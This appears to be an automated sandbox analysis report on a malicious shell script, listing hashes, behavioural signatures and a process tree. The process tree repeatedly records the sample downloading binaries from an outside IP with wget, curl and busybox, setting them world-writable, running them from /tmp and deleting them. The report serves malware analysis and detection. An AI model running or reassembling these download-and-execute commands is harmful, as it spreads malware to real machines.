Analysis
-
max time kernel
41s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
24/11/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
-
Size
10KB
-
MD5
90e40b4503b0424a058f69437e1026ff
-
SHA1
035df066045d7bc2ab807fc923f25cf1a0f3e70e
-
SHA256
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474
-
SHA512
adfa914962ae7273bfd9238ce16c5b177765452a64ba873335cc42fdab6cf5cf072fb12803403aa10b44c957efbc5e2a76de724c912bde8c573afee70a1a1795
-
SSDEEP
192:8zddR70qV5mSi1dGxvSgM3omSi1de72gdR70qVa:8zddR70kHxvSgM3S72gdR70ka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh1⤵PID:1513
-
/bin/rm/bin/rm bins.sh2⤵PID:1514
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1515
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1521
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1524
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1525
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1527
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1530
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1531
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1533
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1536
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1539
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1542
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1545
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1548
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1551
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1554
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1557
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1560
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1563
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1566
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1569
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1572
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1573
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1575
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1578
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1581
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1587
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1590
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1591
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1593
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1596
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1599
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1602
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1603
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1605
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:1608
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1609
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1611
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:1614
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1615
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1617
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:1620
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1623
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:1626
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1627
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1629
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:1632
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1633
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1635
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:1638
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1639
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1641
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:1644
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1649
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:1652
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1655
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1658
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1659
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Writes file to tmp directory
PID:1660
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1661
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:1662
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:1663
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1664
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1665
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1667
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:1669
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1670
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1671
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Writes file to tmp directory
PID:1672
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1673
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:1674
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:1675
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1676
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1677
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Writes file to tmp directory
PID:1678
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1679
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:1680
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:1681
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1682
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1683
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Writes file to tmp directory
PID:1684
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1685
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:1686
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:1687
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1688
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97